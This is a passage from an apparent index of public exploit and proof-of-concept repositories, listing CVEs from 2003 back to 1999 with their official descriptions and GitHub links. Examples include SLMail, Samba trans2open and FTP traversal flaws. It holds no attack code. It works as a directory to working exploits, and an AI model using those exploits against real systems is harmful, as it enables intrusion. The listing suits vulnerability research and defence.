Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.

- [marb08/etherleak-checker](https://github.com/marb08/etherleak-checker)

### CVE-2003-0172 (2003-03-29)

Buffer overflow in openlog function for PHP 4.3.1 on Windows operating system, and possibly other OSes, allows remote attackers to cause a crash and possibly execute arbitrary code via a long filename argument.

- [cyberdesu/Remote-Buffer-overflow-CVE-2003-0172](https://github.com/cyberdesu/Remote-Buffer-overflow-CVE-2003-0172)

### CVE-2003-0201 (2003-04-15)

Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

- [KernelPan1k/trans2open-CVE-2003-0201](https://github.com/KernelPan1k/trans2open-CVE-2003-0201)

### CVE-2003-0222 (2003-04-30)

Stack-based buffer overflow in Oracle Net Services for Oracle Database Server 9i release 2 and earlier allows attackers to execute arbitrary code via a "CREATE DATABASE LINK" query containing a connect string with a long USING parameter.

- [phamthanhsang280477/CVE-2003-0222](https://github.com/phamthanhsang280477/CVE-2003-0222)

### CVE-2003-0264 (2003-05-08)

Multiple buffer overflows in SLMail 5.1.0.4420 allows remote attackers to execute arbitrary code via (1) a long EHLO argument to slmail.exe, (2) a long XTRN argument to slmail.exe, (3) a long string to POPPASSWD, or (4) a long password to the POP3 server.

- [adenkiewicz/CVE-2003-0264](https://github.com/adenkiewicz/CVE-2003-0264)
- [fyoderxx/slmail-exploit](https://github.com/fyoderxx/slmail-exploit)
- [war4uthor/CVE-2003-0264](https://github.com/war4uthor/CVE-2003-0264)
- [pwncone/CVE-2003-0264-SLmail-5.5](https://github.com/pwncone/CVE-2003-0264-SLmail-5.5)
- [vrikodar/CVE-2003-0264_EXPLOIT](https://github.com/vrikodar/CVE-2003-0264_EXPLOIT)
- [nobodyatall648/CVE-2003-0264](https://github.com/nobodyatall648/CVE-2003-0264)

### CVE-2003-0282 (2003-05-14)

Directory traversal vulnerability in UnZip 5.50 allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence.

- [silasol/cve-2003-0282](https://github.com/silasol/cve-2003-0282)

### CVE-2003-0358 (2003-05-30)

Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.

- [gmh5225/CVE-2003-0358](https://github.com/gmh5225/CVE-2003-0358)
- [fengjixuchui/CVE-2003-0358](https://github.com/fengjixuchui/CVE-2003-0358)

## 2002
### CVE-2002-0200 (2002-05-03)

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.

- [alt3kx/CVE-2002-0200](https://github.com/alt3kx/CVE-2002-0200)

### CVE-2002-0201 (2002-05-03)

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.

- [alt3kx/CVE-2002-0201](https://github.com/alt3kx/CVE-2002-0201)

### CVE-2002-0288 (2002-05-03)

Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request.

- [alt3kx/CVE-2002-0288](https://github.com/alt3kx/CVE-2002-0288)

### CVE-2002-0289 (2002-05-03)

Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request.

- [alt3kx/CVE-2002-0289](https://github.com/alt3kx/CVE-2002-0289)

### CVE-2002-0346 (2002-05-03)

Cross-site scripting vulnerability in Cobalt RAQ 4 allows remote attackers to execute arbitrary script as other Cobalt users via Javascript in a URL to (1) service.cgi or (2) alert.cgi.

- [alt3kx/CVE-2002-0346](https://github.com/alt3kx/CVE-2002-0346)

### CVE-2002-0347 (2002-05-03)

Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request.

- [alt3kx/CVE-2002-0347](https://github.com/alt3kx/CVE-2002-0347)

### CVE-2002-0348 (2002-05-03)

service.cgi in Cobalt RAQ 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long service argument.

- [alt3kx/CVE-2002-0348](https://github.com/alt3kx/CVE-2002-0348)

### CVE-2002-0448 (2002-06-11)

Xerver Free Web Server 2.10 and earlier allows remote attackers to cause a denial of service (crash) via an HTTP request that contains many "C:/" sequences.

- [alt3kx/CVE-2002-0448](https://github.com/alt3kx/CVE-2002-0448)

### CVE-2002-0740 (2002-07-26)

Buffer overflow in slrnpull for the SLRN package, when installed setuid or setgid, allows local users to gain privileges via a long -d (SPOOLDIR) argument.

- [alt3kx/CVE-2002-0740](https://github.com/alt3kx/CVE-2002-0740)

### CVE-2002-0748 (2003-04-02)

LabVIEW Web Server 5.1.1 through 6.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request that ends in two newline characters, instead of the expected carriage return/newline combinations.

- [fauzanwijaya/CVE-2002-0748](https://github.com/fauzanwijaya/CVE-2002-0748)

### CVE-2002-0991 (2002-08-31)

Buffer overflows in the cifslogin command for HP CIFS/9000 Client A.01.06 and earlier, based on the Sharity package, allows local users to gain root privileges via long (1) -U, (2) -D, (3) -P, (4) -S, (5) -N, or (6) -u parameters.

- [alt3kx/CVE-2002-0991](https://github.com/alt3kx/CVE-2002-0991)

### CVE-2002-1614 (2005-03-25)

Buffer overflow in HP Tru64 UNIX allows local users to execute arbitrary code via a long argument to /usr/bin/at.

- [wlensinas/CVE-2002-1614](https://github.com/wlensinas/CVE-2002-1614)

### CVE-2002-2420 (2007-11-01)

site_searcher.cgi in Super Site Searcher allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter.

- [krdsploit/CVE-2002-2420](https://github.com/krdsploit/CVE-2002-2420)

### CVE-2002-20001 (2021-11-11)

The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys, and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)at or D(HE)ater attack. The client needs very little CPU resources and network bandwidth. The attack may be more disruptive in cases where a client can require a server to select its largest supported key size. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE.

- [c0r0n3r/dheater](https://github.com/c0r0n3r/dheater)

## 2001
### CVE-2001-0550 (2002-06-25)

wu-ftpd 2.6.1 allows remote attackers to execute arbitrary commands via a "~{" argument to commands such as CWD, which is not properly handled by the glob function (ftpglob).

- [gilberto47831/Network-Filesystem-Forensics](https://github.com/gilberto47831/Network-Filesystem-Forensics)

### CVE-2001-0680 (2002-03-09)

Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0 allows a remote attacker to traverse directories on the web server via a "dot dot" attack in a LIST (ls) command.

- [alt3kx/CVE-2001-0680](https://github.com/alt3kx/CVE-2001-0680)

### CVE-2001-0758 (2001-10-12)

Directory traversal vulnerability in Shambala 4.5 allows remote attackers to escape the FTP root directory via "CWD ..." command.

- [alt3kx/CVE-2001-0758](https://github.com/alt3kx/CVE-2001-0758)

### CVE-2001-0931 (2002-02-02)

Directory traversal vulnerability in Cooolsoft PowerFTP Server 2.03 allows attackers to list or read arbitrary files and directories via a .. (dot dot) in (1) LS or (2) GET.

- [alt3kx/CVE-2001-0931](https://github.com/alt3kx/CVE-2001-0931)

### CVE-2001-0932 (2002-02-02)

Buffer overflow in Cooolsoft PowerFTP Server 2.03 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long command.

- [alt3kx/CVE-2001-0932](https://github.com/alt3kx/CVE-2001-0932)

### CVE-2001-0933 (2002-02-02)

Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".

- [alt3kx/CVE-2001-0933](https://github.com/alt3kx/CVE-2001-0933)

### CVE-2001-0934 (2002-02-02)

Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.

- [alt3kx/CVE-2001-0934](https://github.com/alt3kx/CVE-2001-0934)

### CVE-2001-1442 (2005-04-21)

Buffer overflow in innfeed for ISC InterNetNews (INN) before 2.3.0 allows local users in the "news" group to gain privileges via a long -c command line argument.

- [alt3kx/CVE-2001-1442](https://github.com/alt3kx/CVE-2001-1442)

### CVE-2001-3389
- [becrevex/Gaston](https://github.com/becrevex/Gaston)

## 2000
### CVE-2000-0114 (2000-02-08)

Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.

- [Cappricio-Securities/CVE-2000-0114](https://github.com/Cappricio-Securities/CVE-2000-0114)
- [Josekutty-K/frontpage-server-extensions-vulnerability-scanner](https://github.com/Josekutty-K/frontpage-server-extensions-vulnerability-scanner)
- [adhamelhansye/CVE-2000-0114](https://github.com/adhamelhansye/CVE-2000-0114)

### CVE-2000-0170 (2000-04-10)

Buffer overflow in the man program in Linux allows local users to gain privileges via the MANPAGER environmental variable.

- [mike182/exploit](https://github.com/mike182/exploit)

### CVE-2000-0649 (2000-08-03)

IIS 4.0 allows remote attackers to obtain the internal IP address of the server via an HTTP 1.0 request for a web page which is protected by basic authentication and has no realm defined.

- [rafaelh/CVE-2000-0649](https://github.com/rafaelh/CVE-2000-0649)
- [stevenvegar/cve-2000-0649](https://github.com/stevenvegar/cve-2000-0649)
- [Downgraderz/PoC-CVE-2000-0649](https://github.com/Downgraderz/PoC-CVE-2000-0649)

### CVE-2000-0979 (2001-01-22)

File and Print Sharing service in Windows 95, Windows 98, and Windows Me does not properly check the password for a file share, which allows remote attackers to bypass share access controls by sending a 1-byte password that matches the first character of the real password, aka the "Share Level Password" vulnerability.

- [Z6543/CVE-2000-0979](https://github.com/Z6543/CVE-2000-0979)

## 1999
### CVE-1999-0016 (1999-09-29)

Land IP denial of service.

- [pexmee/CVE-1999-0016-Land-DOS-tool](https://github.com/pexmee/CVE-1999-0016-Land-DOS-tool)
- [Pommaq/CVE-1999-0016-POC](https://github.com/Pommaq/CVE-1999-0016-POC)

### CVE-1999-0532 (2000-02-04)

A DNS server allows zone transfers.

- [websecnl/Bulk_CVE-1999-0532_Scanner](https://github.com/websecnl/Bulk_CVE-1999-0532_Scanner)
- [Rodney-O-C-Melby/dns-zone-transfer-test](https://github.com/Rodney-O-C-Melby/dns-zone-transfer-test)

### CVE-1999-1053 (2001-09-12)

guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".

- [siunam321/CVE-1999-1053-PoC](https://github.com/siunam321/CVE-1999-1053-PoC)